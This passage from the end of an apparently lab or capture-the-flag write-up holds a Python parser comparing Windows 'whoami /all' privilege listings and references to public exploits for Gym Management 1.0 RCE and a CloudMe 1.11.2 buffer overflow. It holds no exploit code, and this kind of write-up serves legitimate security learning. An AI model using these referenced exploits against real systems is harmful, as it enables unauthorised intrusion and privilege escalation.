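BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
PRIVILEGES INFORMATION
Privilege Name          Description                               State
SeShutdownPrivilege     Shut down the system                      Disabled
SeBackupPrivilege       Back up files and directories             Disabled
SeDebugPrivilege        Debug programs                            Disabled
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
ERROR: Unable to get user claims information.
"""

if __name__ == "__main__":
    report = escalation_report(parse_whoami_all(SHAUN), parse_whoami_all(ADMIN))
    for key, value in report.items():
        print(f"{key}: {value}")
```

The trailing "ERROR: Unable to get user claims information." line that whoami printed for Administrator is ignored by the parser, so the real output can be piped in unchanged.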
References
[Gym Management 1.0 unauthenticated RCE](https://github.com/0xConstant/Gym-Management-1.0-unauthenticated-RCE)
[CloudMe 1.11.2 - Buffer Overflow (PoC)](https://www.exploit-db.com/exploits/48389)
Lessons Learned